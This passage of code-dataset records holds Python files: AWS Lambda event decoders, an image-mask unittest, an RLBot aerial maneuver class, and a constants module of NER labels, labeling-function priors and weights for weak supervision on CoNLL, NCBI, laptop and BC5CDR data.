EventType.UNKNOWN\n\n\ndef get_kinesis_event_json_data_list(event):\n records = []\n\n for record in event['Records']:\n data = base64.b64decode(record['kinesis']['data'])\n records.append(json.loads(data))\n\n return records\n\n\ndef get_sns_event_json_data_list(event):\n records = []\n\n for record in event['Records']:\n data = record['Sns']['Message']\n records.append(json.loads(data))\n\n return records\n","sub_path":"awslambdautils/lambda_events.py","file_name":"lambda_events.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519680170","text":"#!/usr/bin/env python3\n\n# Copyright 2018 Johns Hopkins University (author: Desh Raj)\n# Apache 2.0\n\n\"\"\" \nTest cases for visualizing image with mask and compressing image with mask. 
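# Typical use of the helpers above inside a Lambda handler: detect the event
# source, then decode the records. The event below is a hand-built
# Kinesis-shaped payload for illustration, not a capture from AWS:
import base64
import json

fake_event = {
    'Records': [
        {'kinesis': {'data': base64.b64encode(json.dumps({'id': 1}).encode()).decode()}}
    ]
}

assert get_event_type(fake_event) == EventType.KINESIS
assert get_kinesis_event_json_data_list(fake_event) == [{'id': 1}]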
\n\"\"\"\n\nfrom dataset import DatasetICDAR2015\nfrom waldo.data_visualization import visualize_mask\nfrom waldo.data_manipulation import compress_image_with_mask\nfrom waldo.core_config import CoreConfig\n\nimport sys\nimport random\nimport numpy as np\nimport unittest\n\nDL_DIR = '/export/b18/draj/icdar_2015/'\nTRANSPARENCY = 0.3\n\nclass ImageUtilsTest(unittest.TestCase):\n \"\"\"Testing image utilities: visualization and compression\n \"\"\"\n def setUp(self):\n \"\"\"This method sets up objects for all the test cases.\n \"\"\"\n icdar = DatasetICDAR2015(DL_DIR)\n data = icdar.load_data()\n self.test_object = random.choice(data['test'])\n\n self.c = CoreConfig()\n self.c.num_colors = self.test_object['img'].shape[2]\n\n self.transparency = TRANSPARENCY\n\n\n def test_visualize_object(self):\n \"\"\"Given a dictionary object as follows\n x['img']: numpy array of shape (height,width,colors)\n x['mask']: numpy array of shape (height,width), with every element categorizing it \n into one of the object ids\n The method generates an image overlaying a translucent mask on the image.\n \"\"\"\n visualize_mask(self.test_object, self.c, self.transparency)\n\n\n def test_compress_object(self):\n \"\"\"Given a dictionary object as follows\n x['img']: numpy array of shape (height,width,colors)\n x['mask']: numpy array of shape (height,width), with every element categorizing it \n into one of the object ids\n The method compresses the object and prints the original and compressed sizes.\n It also asserts that the original size should be greater than the compressed size.\n \"\"\"\n y = compress_image_with_mask(self.test_object,self.c)\n x_mem = sys.getsizeof(self.test_object)\n y_mem = sys.getsizeof(y)\n self.assertTrue(y_mem <= x_mem)\n\n\nif __name__ == '__main__':\n unittest.main()\n ","sub_path":"egs/icdar2015/v1/local/utils/image_utils_test.py","file_name":"image_utils_test.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165130570","text":"from maneuvers.kit import *\r\n\r\nfrom RLUtilities.Maneuvers import Aerial as RLUAerial\r\n\r\nclass Aerial(RLUAerial):\r\n\r\n def step(self, dt):\r\n super().step(dt)\r\n if self.total_timer > 1 and self.car.on_ground:\r\n self.finished = True\r\n\r\n def render(self, draw: DrawingTool):\r\n draw.color(draw.yellow)\r\n draw.car_trajectory(self.car, self.t_arrival)\r\n draw.color(draw.lime)\r\n draw.point(self.target)","sub_path":"RLBotPack/BotimusPrime/source/maneuvers/air/aerial.py","file_name":"aerial.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"223152612","text":"\"\"\"\n----------------------------------------------------------------------------------------------------------------------\nList of Labels, annotation formats, and\nprior probabilities used for source selection and model initialization\n\"\"\"\nimport numpy as np\n# import os\n#\n# ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nimport pathlib\nROOT_DIR = str(pathlib.Path(__file__).parent.parent.absolute())\n\nOntoNotes_LABELS = ['CARDINAL', \"COMPANY\", 'DATE', 'EVENT', 'FAC', 'GPE', 'LANGUAGE', 'LAW', 'LOC', 'MONEY',\n 'NORP', 'ORDINAL', 'ORG', 'PERCENT', 'PERSON', 'PRODUCT', 'QUANTITY', 'TIME', 'WORK_OF_ART']\n\nCoNLL_LABELS = [\"PER\", \"LOC\", \"ORG\", \"MISC\"]\n\nOntoNotes_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in OntoNotes_LABELS for bi in 
\"BI\"]\nOntoNotes_INDICES = {label: i for i, label in enumerate(OntoNotes_BIO)}\n\nCoNLL_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in CoNLL_LABELS for bi in \"BI\"]\nCoNLL_INDICES = {label: i for i, label in enumerate(CoNLL_BIO)}\n\nCoNLL_SOURCE_NAMES = ['BTC', 'BTC+c', 'SEC', 'SEC+c', 'company_type_detector', 'compound_detector',\n 'conll2003', 'conll2003+c', 'core_web_md', 'core_web_md+c', 'crunchbase_cased',\n 'crunchbase_uncased',\n 'date_detector',\n 'doc_history', 'doc_majority_cased', 'doc_majority_uncased', 'full_name_detector', 'geo_cased',\n 'geo_uncased',\n 'infrequent_compound_detector', 'infrequent_nnp_detector', 'infrequent_proper2_detector',\n 'infrequent_proper_detector',\n 'legal_detector', 'misc_detector', 'money_detector',\n 'multitoken_crunchbase_cased', 'multitoken_crunchbase_uncased', 'multitoken_geo_cased',\n 'multitoken_geo_uncased',\n 'multitoken_product_cased', 'multitoken_product_uncased', 'multitoken_wiki_cased',\n 'multitoken_wiki_small_cased',\n 'multitoken_wiki_small_uncased', 'multitoken_wiki_uncased', 'nnp_detector', 'number_detector',\n 'product_cased',\n 'product_uncased', 'proper2_detector', 'proper_detector', 'snips', 'time_detector', 'wiki_cased',\n 'wiki_small_cased',\n 'wiki_small_uncased', 'wiki_uncased']\n\n# CoNLL_SOURCE_TO_KEEP = [\n# 'BTC+c', 'core_web_md+c', 'crunchbase_uncased', 'wiki_uncased',\n# 'geo_uncased', 'doc_majority_uncased'\n# ]\n\nCoNLL_SOURCE_TO_KEEP = ['BTC+c', 'SEC+c', 'core_web_md+c', 'crunchbase_cased', 'crunchbase_uncased',\n 'doc_majority_cased', 'doc_majority_uncased',\n 'full_name_detector', 'geo_cased', 'geo_uncased', 'misc_detector',\n 'wiki_cased', 'wiki_uncased']\n\n# CoNLL_SOURCE_TO_KEEP = [\n# 'BTC', 'BTC+c', 'SEC', 'SEC+c', 'company_type_detector', 'compound_detector',\n# 'core_web_md', 'core_web_md+c', 'crunchbase_cased',\n# 'crunchbase_uncased',\n# 'date_detector',\n# 'doc_history', 'doc_majority_cased', 'doc_majority_uncased', 'full_name_detector', 'geo_cased',\n# 'geo_uncased',\n# 'infrequent_compound_detector', 'infrequent_nnp_detector', 'infrequent_proper2_detector',\n# 'infrequent_proper_detector',\n# 'legal_detector', 'misc_detector', 'money_detector',\n# 'multitoken_crunchbase_cased', 'multitoken_crunchbase_uncased', 'multitoken_geo_cased',\n# 'multitoken_geo_uncased',\n# 'multitoken_product_cased', 'multitoken_product_uncased', 'multitoken_wiki_cased',\n# 'multitoken_wiki_small_cased',\n# 'multitoken_wiki_small_uncased', 'multitoken_wiki_uncased', 'nnp_detector', 'number_detector',\n# 'product_cased',\n# 'product_uncased', 'proper2_detector', 'proper_detector', 'snips', 'time_detector', 'wiki_cased',\n# 'wiki_small_cased',\n# 'wiki_small_uncased', 'wiki_uncased'\n# ]\n\nNUMBER_NERS = [\"CARDINAL\", \"DATE\", \"MONEY\", \"ORDINAL\", \"PERCENT\", \"QUANTITY\", \"TIME\"]\n\n# the numbers are precision and recall\nCoNLL_SOURCE_PRIORS = {\n 'BTC': {lbs: (0.4, 0.4) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.3, 0.3) for lbs in\n OntoNotes_LABELS if\n lbs not in NUMBER_NERS},\n 'BTC+c': {lbs: (0.5, 0.5) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\", \"MONEY\"] else (0.4, 0.4) for lbs in\n OntoNotes_LABELS},\n 'SEC': {lbs: (0.1, 0.1) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.05, 0.05) for lbs in\n OntoNotes_LABELS if\n lbs not in NUMBER_NERS},\n 'SEC+c': {lbs: (0.1, 0.1) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\", \"MONEY\"] else (0.05, 0.05) for lbs in\n OntoNotes_LABELS},\n 'company_type_detector': {'COMPANY': 
(0.9999, 0.4)},\n 'compound_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n 'conll2003': {lbs: (0.7, 0.7) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.4, 0.4)\n for lbs in OntoNotes_LABELS if lbs not in NUMBER_NERS},\n 'conll2003+c': {lbs: (0.7, 0.7) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.4, 0.4)\n for lbs in OntoNotes_LABELS},\n \"core_web_md\": {lbs: (0.9, 0.9) for lbs in OntoNotes_LABELS},\n \"core_web_md+c\": {lbs: (0.95, 0.95) for lbs in OntoNotes_LABELS},\n \"crunchbase_cased\": {lbs: (0.7, 0.6) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n \"crunchbase_uncased\": {lbs: (0.6, 0.7) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n 'date_detector': {'DATE': (0.9, 0.9)},\n 'doc_history': {lbs: (0.99, 0.4) for lbs in [\"PERSON\", \"COMPANY\"]},\n 'doc_majority_cased': {lbs: (0.98, 0.4) for lbs in OntoNotes_LABELS},\n 'doc_majority_uncased': {lbs: (0.95, 0.5) for lbs in OntoNotes_LABELS},\n 'full_name_detector': {'PERSON': (0.9999, 0.4)},\n \"geo_cased\": {lbs: (0.8, 0.8) for lbs in [\"GPE\", \"LOC\"]},\n \"geo_uncased\": {lbs: (0.8, 0.8) for lbs in [\"GPE\", \"LOC\"]},\n 'infrequent_compound_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'infrequent_nnp_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'infrequent_proper2_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'infrequent_proper_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'legal_detector': {\"LAW\": (0.8, 0.8)},\n 'misc_detector': {lbs: (0.7, 0.7) for lbs in [\"NORP\", \"EVENT\", \"FAC\", \"GPE\", \"LANGUAGE\"]},\n 'money_detector': {'MONEY': (0.9, 0.9)},\n 'multitoken_crunchbase_cased': {lbs: (0.8, 0.6) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n 'multitoken_crunchbase_uncased': {lbs: (0.7, 0.7) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n 'multitoken_geo_cased': {lbs: (0.8, 0.6) for lbs in [\"GPE\", \"LOC\"]},\n 'multitoken_geo_uncased': {lbs: (0.7, 0.7) for lbs in [\"GPE\", \"LOC\"]},\n 'multitoken_product_cased': {\"PRODUCT\": (0.8, 0.6)},\n 'multitoken_product_uncased': {\"PRODUCT\": (0.7, 0.7)},\n 'multitoken_wiki_cased': {lbs: (0.8, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'multitoken_wiki_small_cased': {lbs: (0.8, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'multitoken_wiki_small_uncased': {lbs: (0.7, 0.7) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'multitoken_wiki_uncased': {lbs: (0.7, 0.7) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'nnp_detector': {lbs: (0.8, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n \"number_detector\": {lbs: (0.9, 0.9) for lbs in [\"CARDINAL\", \"ORDINAL\", \"QUANTITY\", \"PERCENT\"]},\n 'product_cased': {\"PRODUCT\": (0.7, 0.6)},\n 'product_uncased': {\"PRODUCT\": (0.6, 0.7)},\n 'proper2_detector': {lbs: (0.6, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n 'proper_detector': {lbs: (0.6, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n \"snips\": {lbs: (0.8, 0.8) for lbs in [\"DATE\", \"TIME\", \"PERCENT\", \"CARDINAL\", \"ORDINAL\", \"MONEY\"]},\n 'time_detector': {'TIME': (0.9, 
0.9)},\n 'wiki_cased': {lbs: (0.6, 0.5) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'wiki_small_cased': {lbs: (0.7, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'wiki_small_uncased': {lbs: (0.6, 0.7) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'wiki_uncased': {lbs: (0.5, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]}}\n\n# In some rare cases (due to specialisations of corrections of labels), we also need to add some other labels\nfor lb_source in [\"BTC\", \"BTC+c\", \"SEC\", \"SEC+c\", \"conll2003\", \"conll2003+c\"]:\n CoNLL_SOURCE_PRIORS[lb_source].update({lbs: (0.8, 0.01) for lbs in NUMBER_NERS})\n\nOUT_RECALL = 0.9\nOUT_PRECISION = 0.8\n\n\"\"\"\n----------------------------------------------------------------------------------------------------------------------\nEvaluation-related constants\n\"\"\"\n\nCoNLL_MAPPINGS = {\"PERSON\": \"PER\", \"COMPANY\": \"ORG\", \"GPE\": \"LOC\", 'EVENT': \"MISC\", 'FAC': \"MISC\", 'LANGUAGE': \"MISC\",\n 'LAW': \"MISC\", 'NORP': \"MISC\", 'PRODUCT': \"MISC\", 'WORK_OF_ART': \"MISC\"}\n\nCONLL_SRC_PRIORS = dict()\nfor src, priors in CoNLL_SOURCE_PRIORS.items():\n transferred_lbs = dict()\n for lb_name, ps in priors.items():\n norm_lb = CoNLL_MAPPINGS.get(lb_name, lb_name)\n if norm_lb not in CoNLL_LABELS:\n continue\n if norm_lb not in transferred_lbs:\n transferred_lbs[norm_lb] = [list(), list()]\n transferred_lbs[norm_lb][0].append(ps[0])\n transferred_lbs[norm_lb][1].append(ps[1])\n for norm_lb in transferred_lbs:\n transferred_lbs[norm_lb][0] = np.mean(transferred_lbs[norm_lb][0])\n transferred_lbs[norm_lb][1] = np.mean(transferred_lbs[norm_lb][1])\n transferred_lbs[norm_lb] = tuple(transferred_lbs[norm_lb])\n CONLL_SRC_PRIORS[src] = transferred_lbs\n\n# CoNLL_SOURCE_WEIGHTS = {\n# 'BTC':0.01, 'BTC+c':0.6, 'SEC':0.01, 'SEC+c':0.4, 'company_type_detector':0.01, 'compound_detector':0.01,\n# 'conll2003':0.01, 'conll2003+c':0.01, 'core_web_md':0.01, 'core_web_md+c':0.7, 'crunchbase_cased':0.4,\n# 'crunchbase_uncased':0.35,\n# 'date_detector':0.01,\n# 'doc_history':0.01, 'doc_majority_cased':0.65, 'doc_majority_uncased':0.60, 'full_name_detector':0.9, 'geo_cased':0.7,\n# 'geo_uncased':0.65,\n# 'infrequent_compound_detector':0.01, 'infrequent_nnp_detector':0.01, 'infrequent_proper2_detector':0.01,\n# 'infrequent_proper_detector':0.01,\n# 'legal_detector':0.01, 'misc_detector':0.85, 'money_detector':0.01,\n# 'multitoken_crunchbase_cased':0.01, 'multitoken_crunchbase_uncased':0.01, 'multitoken_geo_cased':0.01,\n# 'multitoken_geo_uncased':0.01,\n# 'multitoken_product_cased':0.01, 'multitoken_product_uncased':0.01, 'multitoken_wiki_cased':0.01,\n# 'multitoken_wiki_small_cased':0.01,\n# 'multitoken_wiki_small_uncased':0.01, 'multitoken_wiki_uncased':0.01, 'nnp_detector':0.01, 'number_detector':0.01,\n# 'product_cased':0.01,\n# 'product_uncased':0.01, 'proper2_detector':0.01, 'proper_detector':0.01, 'snips':0.01, 'time_detector':0.01, 'wiki_cased':0.75,\n# 'wiki_small_cased':0.01,\n# 'wiki_small_uncased':0.01, 'wiki_uncased':0.70\n# }\n\nCoNLL_SOURCE_WEIGHTS = {'BTC':0.01, 'BTC+c':[0.6156,0.5731,0.5731,0,0,0.4948,0.4948,0.7887,0.7887], 'SEC':0.01, 'SEC+c':[0.3954,0.3818,0.3818,0.8723,0.8723,0.1963,0.1963,0.7189,0.7189], 'company_type_detector':0.01, 'compound_detector':0.01,\n 'conll2003':0.01, 'conll2003+c':0.01, 'core_web_md':0.01, 
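# The loop above collapses OntoNotes-style priors onto the CoNLL label set
# and averages the (precision, recall) pairs of every label mapped to the
# same target. The same reduction in miniature, with made-up numbers:
import numpy as np

priors = {'PERSON': (0.9, 0.8), 'GPE': (0.8, 0.8), 'LOC': (0.6, 0.7)}
mapping = {'PERSON': 'PER', 'GPE': 'LOC'}

merged = {}
for lb, (p, r) in priors.items():
    norm = mapping.get(lb, lb)
    merged.setdefault(norm, ([], []))
    merged[norm][0].append(p)
    merged[norm][1].append(r)
merged = {k: (float(np.mean(ps)), float(np.mean(rs))) for k, (ps, rs) in merged.items()}
# -> {'PER': (0.9, 0.8), 'LOC': (0.7, 0.75)}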
'core_web_md+c':[0.6953,0.7268,0.7268,0.678,0.678,0.5107,0.5107,0.8132,0.8132], 'crunchbase_cased':[0.3826,0,0,0,0,0.2993,0.2993,0.9189,0.9189],\n 'crunchbase_uncased':[0.3788,0,0,0,0,0.305,0.305,0.9189,0.9189],\n 'date_detector':0.01,\n 'doc_history':0.01, 'doc_majority_cased':[0.6581,0.7554,0.7554,0.8261,0.8261,0.502,0.502,0.6196,0.6196], 'doc_majority_uncased':[0.6169,0.7434,0.7434,0.8063,0.8063,0.43,0.43,0.5924,0.5924], 'full_name_detector':[0.8779,0,0,0,0,0,0,0.8779,0.8779], 'geo_cased':[0.6816,0.6816,0.6816,0,0,0,0,0,0],\n 'geo_uncased':[0.651,0.651,0.651,0,0,0,0,0,0],\n 'infrequent_compound_detector':0.01, 'infrequent_nnp_detector':0.01, 'infrequent_proper2_detector':0.01,\n 'infrequent_proper_detector':0.01,\n 'legal_detector':0.01, 'misc_detector':[0.8514,0.9334,0.9334,0.7388,0.7388,0,0,0,0], 'money_detector':0.01,\n 'multitoken_crunchbase_cased':0.01, 'multitoken_crunchbase_uncased':0.01, 'multitoken_geo_cased':0.01,\n 'multitoken_geo_uncased':0.01,\n 'multitoken_product_cased':0.01, 'multitoken_product_uncased':0.01, 'multitoken_wiki_cased':0.01,\n 'multitoken_wiki_small_cased':0.01,\n 'multitoken_wiki_small_uncased':0.01, 'multitoken_wiki_uncased':0.01, 'nnp_detector':0.01, 'number_detector':0.01,\n 'product_cased':0.01,\n 'product_uncased':0.01, 'proper2_detector':0.01, 'proper_detector':0.01, 'snips':0.01, 'time_detector':0.01, 'wiki_cased':[0.7527,0.6959,0.6959,0,0,0.9082,0.9082,0.8155,0.8155],\n 'wiki_small_cased':0.01,\n 'wiki_small_uncased':0.01, 'wiki_uncased':[0.7226,0.6763,0.6763,0,0,0.8744,0.8744,0.7784,0.7784]}\n\nNCBI_LABELS = ['DISEASE']\nNCBI_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in NCBI_LABELS for bi in \"BI\"]\nNCBI_INDICES = {label: i for i, label in enumerate(NCBI_BIO)}\n\nNCBI_SOURCE_NAMES = ['CoreDictionaryUncased', 'CoreDictionaryExact', 'CancerLike',\n 'CommonSuffixes', 'Deficiency', 'Disorder',\n 'Lesion', 'Syndrome', 'BodyTerms',\n 'OtherPOS', 'StopWords', 'Punctuation',\n 'PossessivePhrase', 'HyphenatedPhrase', 'ElmoLinkingRule',\n 'CommonBigram', 'ExtractedPhrase']\n\nNCBI_SOURCES_TO_KEEP = ['CoreDictionaryUncased', 'CoreDictionaryExact', 'CancerLike', 'BodyTerms', 'ExtractedPhrase']\n# NCBI_SOURCES_TO_KEEP = ['CoreDictionaryUncased', 'CoreDictionaryExact']\n\nNCBI_SOURCE_PRIORS = {\n 'CoreDictionaryUncased': {lbs: (0.8, 0.7) for lbs in NCBI_LABELS},\n 'CoreDictionaryExact': {lbs: (0.9, 0.5) for lbs in NCBI_LABELS},\n 'CancerLike': {lbs: (0.5, 0.4) for lbs in NCBI_LABELS},\n 'CommonSuffixes': {'DISEASE': (0.1, 0.1)},\n 'Deficiency': {'DISEASE': (0.1, 0.1)},\n 'Disorder': {'DISEASE': (0.1, 0.1)},\n 'Lesion': {'DISEASE': (0.1, 0.1)},\n 'Syndrome': {'DISEASE': (0.1, 0.1)},\n \"BodyTerms\": {lbs: (0.5, 0.4) for lbs in NCBI_LABELS},\n \"OtherPOS\": {'DISEASE': (0.1, 0.1)},\n \"StopWords\": {'DISEASE': (0.1, 0.1)},\n \"Punctuation\": {'DISEASE': (0.1, 0.1)},\n \"PossessivePhrase\": {'DISEASE': (0.1, 0.1)},\n \"HyphenatedPhrase\": {'DISEASE': (0.1, 0.1)},\n 'ElmoLinkingRule': {'DISEASE': (0.1, 0.1)},\n 'CommonBigram': {'DISEASE': (0.1, 0.1)},\n 'ExtractedPhrase': {'DISEASE': (0.9, 0.9)}\n}\n\nLAPTOP_LABELS = ['TERM']\nLAPTOP_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in LAPTOP_LABELS for bi in \"BI\"]\nLAPTOP_INDICES = {label: i for i, label in enumerate(LAPTOP_BIO)}\n\nLAPTOP_SOURCE_NAMES = ['CoreDictionary', 'OtherTerms', 'ReplaceThe', 'iStuff',\n 'Feelings', 'ProblemWithThe', 'External', 'StopWords',\n 'Punctuation', 'Pronouns', 'NotFeatures', 'Adv',\n 'CompoundPhrase', 'ElmoLinkingRule', 'ExtractedPhrase', 
'ConsecutiveCapitals']\n\nLAPTOP_SOURCES_TO_KEEP = ['CoreDictionary', 'OtherTerms', 'iStuff', 'ExtractedPhrase', 'ConsecutiveCapitals']\n\nLAPTOP_SOURCE_PRIORS = {\n 'CoreDictionary': {lbs: (0.9, 0.7) for lbs in LAPTOP_LABELS},\n 'OtherTerms': {lbs: (0.6, 0.5) for lbs in LAPTOP_LABELS},\n 'ReplaceThe': {lbs: (0.1, 0.1) for lbs in LAPTOP_LABELS},\n 'iStuff': {'TERM': (0.6, 0.4)},\n 'Feelings': {'TERM': (0.1, 0.1)},\n 'ProblemWithThe': {'TERM': (0.1, 0.1)},\n 'External': {'TERM': (0.5, 0.4)},\n 'StopWords': {'TERM': (0.1, 0.1)},\n \"Punctuation\": {lbs: (0.5, 0.4) for lbs in LAPTOP_LABELS},\n \"Pronouns\": {'TERM': (0.1, 0.1)},\n \"NotFeatures\": {'TERM': (0.1, 0.1)},\n \"Adv\": {'TERM': (0.1, 0.1)},\n \"CompoundPhrase\": {'TERM': (0.1, 0.1)},\n \"ElmoLinkingRule\": {'TERM': (0.6, 0.4)},\n 'ExtractedPhrase': {'TERM': (0.9, 0.9)},\n 'ConsecutiveCapitals': {'TERM': (0.7, 0.6)}\n}\n\n\n\nLAPTOP_SOURCE_WEIGHTS = {\n 'CoreDictionary': [0.7,0.7,0.7],\n 'OtherTerms': [0.1,0.1,0.1],\n 'ReplaceThe': 0.01,\n 'iStuff': [0.3,0.3,0.3],\n 'Feelings': 0.01,\n 'ProblemWithThe': 0.01,\n 'External': 0.01,\n 'StopWords': 0.01,\n \"Punctuation\": 0.01,\n \"Pronouns\": 0.01,\n \"NotFeatures\": 0.01,\n \"Adv\": 0.01,\n \"CompoundPhrase\": 0.01,\n \"ElmoLinkingRule\": 0.01,\n 'ExtractedPhrase': [0.95,0.95,0.95],\n 'ConsecutiveCapitals': [0.35,0.35,0.35],\n}\n\n\n# LAPTOP_SOURCE_WEIGHTS = {\n# 'CoreDictionary': 0.7,\n# 'OtherTerms': 0.1,\n# 'ReplaceThe': 0.01,\n# 'iStuff': 0.3,\n# 'Feelings': 0.01,\n# 'ProblemWithThe': 0.01,\n# 'External': 0.01,\n# 'StopWords': 0.01,\n# \"Punctuation\": 0.01,\n# \"Pronouns\": 0.01,\n# \"NotFeatures\": 0.01,\n# \"Adv\": 0.01,\n# \"CompoundPhrase\": 0.01,\n# \"ElmoLinkingRule\": 0.01,\n# 'ExtractedPhrase': 0.95,\n# 'ConsecutiveCapitals': 0.35,\n# }\n\nBC5CDR_LABELS = ['Chemical', 'Disease']\nBC5CDR_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in BC5CDR_LABELS for bi in \"BI\"]\nBC5CDR_INDICES = {label: i for i, label in enumerate(BC5CDR_BIO)}\n\nBC5CDR_SOURCE_NAMES = [\n 'DictCore-Chemical', 'DictCore-Chemical-Exact', 'DictCore-Disease', 'DictCore-Disease-Exact',\n 'Element, Ion, or Isotope', 'Organic Chemical', 'Antibiotic', 'Disease or Syndrome',\n 'BodyTerms', 'Acronyms', 'Damage', 'Disease',\n 'Disorder', 'Lesion', 'Syndrome', 'ChemicalSuffixes',\n 'CancerLike', 'DiseaseSuffixes', 'DiseasePrefixes', 'Induced',\n 'Vitamin', 'Acid', 'OtherPOS', 'StopWords',\n 'CommonOther', 'Punctuation', 'PossessivePhrase', 'HyphenatedPrefix',\n 'PostHyphen', 'ExtractedPhrase'\n]\n\nBC5CDR_SOURCES_TO_KEEP = [\n 'DictCore-Chemical', 'DictCore-Chemical-Exact', 'DictCore-Disease', 'DictCore-Disease-Exact',\n 'Organic Chemical', 'Disease or Syndrome', 'PostHyphen', 'ExtractedPhrase'\n]\n\nBC5CDR_SOURCE_PRIORS = {\n 'DictCore-Chemical': {'Chemical': (0.9, 0.9), 'Disease': (0.1, 0.1)},\n 'DictCore-Chemical-Exact': {'Chemical': (0.9, 0.5), 'Disease': (0.1, 0.1)},\n 'DictCore-Disease': {'Chemical': (0.1, 0.1), 'Disease': (0.9, 0.9)},\n 'DictCore-Disease-Exact': {'Chemical': (0.1, 0.1), 'Disease': (0.9, 0.5)},\n 'Element, Ion, or Isotope': {'Chemical': (0.9, 0.4), 'Disease': (0.1, 0.1)},\n 'Organic Chemical': {'Chemical': (0.9, 0.9), 'Disease': (0.1, 0.1)},\n 'Antibiotic': {'Chemical': (0.9, 0.4), 'Disease': (0.1, 0.1)},\n 'Disease or Syndrome': {'Chemical': (0.1, 0.1), 'Disease': (0.9, 0.7)},\n 'BodyTerms': {'Chemical': (0.1, 0.1), 'Disease': (0.7, 0.3)},\n 'Acronyms': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Damage': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Disease': 
{'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Disorder': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Lesion': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Syndrome': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'ChemicalSuffixes': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'CancerLike': {'Chemical': (0.1, 0.1), 'Disease': (0.7, 0.3)},\n 'DiseaseSuffixes': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'DiseasePrefixes': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Induced': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Vitamin': {'Chemical': (0.9, 0.3), 'Disease': (0.1, 0.1)},\n 'Acid': {'Chemical': (0.9, 0.3), 'Disease': (0.1, 0.1)},\n 'OtherPOS': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'StopWords': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'CommonOther': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'Punctuation': {'Chemical': (0.1, 0.1), 'Disease': (0.1, 0.1)},\n 'PossessivePhrase': {'Chemical': (0.2, 0.2), 'Disease': (0.2, 0.2)},\n 'HyphenatedPrefix': {'Chemical': (0.2, 0.2), 'Disease': (0.2, 0.2)},\n 'PostHyphen': {'Chemical': (0.8, 0.3), 'Disease': (0.8, 0.3)},\n 'ExtractedPhrase': {'Chemical': (0.8, 0.3), 'Disease': (0.8, 0.3)},\n}\n\nBC5CDR_SOURCE_WEIGHTS = {\n 'DictCore-Chemical':0.9,\n 'DictCore-Chemical-Exact':0.85,\n 'DictCore-Disease':0.8,\n 'DictCore-Disease-Exact':0.8,\n 'Element, Ion, or Isotope':0.01,\n 'Organic Chemical':0.9,\n 'Antibiotic':0.01,\n 'Disease or Syndrome':0.75,\n 'BodyTerms':0.01,\n 'Acronyms':0.01,\n 'Damage':0.01,\n 'Disease':0.01,\n 'Disorder':0.01,\n 'Lesion':0.01,\n 'Syndrome':0.01,\n 'ChemicalSuffixes':0.01,\n 